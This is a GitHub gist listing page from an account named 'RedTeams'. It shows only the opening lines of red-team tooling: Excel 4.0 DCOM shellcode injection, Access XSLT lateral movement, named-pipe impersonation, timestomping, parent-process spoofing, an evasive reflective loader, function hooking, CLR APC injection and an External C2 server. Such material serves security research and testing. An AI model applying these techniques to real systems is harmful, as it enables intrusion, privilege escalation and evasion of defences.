Skip to content

Instantly share code, notes, and snippets.

View RedTeams's full-sized avatar

RedTeams

179 followers · 21 following
View GitHub Profile
@RedTeams
RedTeams / Invoke-ExShellcode.ps1
Created July 21, 2019 18:50 — forked from Philts/Invoke-ExShellcode.ps1
<#
Lateral movement and shellcode injection via Excel 4.0 macros
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM
#>
function Invoke-ExShellcode
{
<#
@RedTeams
RedTeams / Invoke-Excel4DCOM64.ps1
Created July 21, 2019 18:50 — forked from Philts/Invoke-Excel4DCOM64.ps1
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************
function Invoke-Excel4DCOM
{
@RedTeams
RedTeams / Invoke-AccessXSLT.ps1
Created July 21, 2019 18:50 — forked from Philts/Invoke-AccessXSLT.ps1
<#
Lateral Movement Via MSACCESS TransformXML
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-AccessXSLT {
<#
@RedTeams
RedTeams / np_impersonate.c
Created July 21, 2019 18:57
Simple demonstration of Named pipe Impersonation
/*
* Great, this technique is overdone maybe...a billion times
* This same technique is used by Metasploit's getsystem()
* command in implementation 1 (getsystem -t 1) by forcing
* a service to connect to an arbitrary named pipe.
*
* The technique is abusable given the following conditions:
* -> SeImpersonatePrivilege _must_ by enabled, I cannot stress
* this enough. Read MSDN, to impersonate other users, you need
* this privilege for the call to complete successfully.
@RedTeams
RedTeams / timestomp.c
Created July 21, 2019 18:57
Demonstrates "timestomping" using ntdll.dll functions.
// Demonstrates "timestomping" using C using Ntdll.Dll function calls.
// Authored by Austin Hudson (Mumbai).
// Able to be compiled with mingw
// x86_64-w64-mingw32-gcc timestomp.c -o timestomp.exe -lntdll
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winternl.h>
#include <ntstatus.h>
#include <stdio.h>
@RedTeams
RedTeams / process_spoof.c
Created July 21, 2019 18:57
static int process_spoof(HANDLE ParentHandle, PCHAR ProcessName)
{
SIZE_T ThreadSize;
STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
RtlSecureZeroMemory(&pi, sizeof(pi));
RtlSecureZeroMemory(&si, sizeof(si));
InitializeProcThreadAttributeList(NULL, 1, 0, &ThreadSize);
si.lpAttributeList = reinterpret_cast<LPPROC_THREAD_ATTRIBUTE_LIST>(HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, ThreadSize));
@RedTeams
RedTeams / loader.c
Created July 21, 2019 18:57
/**
loader.c - Attemps fully port LoadLibrary() to a position-indepedent
vartion to facilitate the self-loading of a DLL and its
dependecies, as well as introduce evasive features to reduce
memory indicators.
Inspiration:
ZeroLoad - https://github.com/zerosum0x0/zeroload (zerosum0x0)
MemoryModule - https://github.com/fancycode/MemoryModule (fancycode)
@RedTeams
RedTeams / hook.c
Created July 21, 2019 18:57
x86/x64 Simple JMP (Relative Offset) function hooking.
#include <windows.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>
#include <stdbool.h>
#if _WIN32 || _WIN64
#if _WIN64
typedef uint64_t uint_t;
#else
@RedTeams
RedTeams / clr_apc.cs
Created July 21, 2019 18:57
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;
public partial class StoredProcedures
{
@RedTeams
RedTeams / extc2_server.c
Created July 21, 2019 18:58
External C2
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
struct s_config {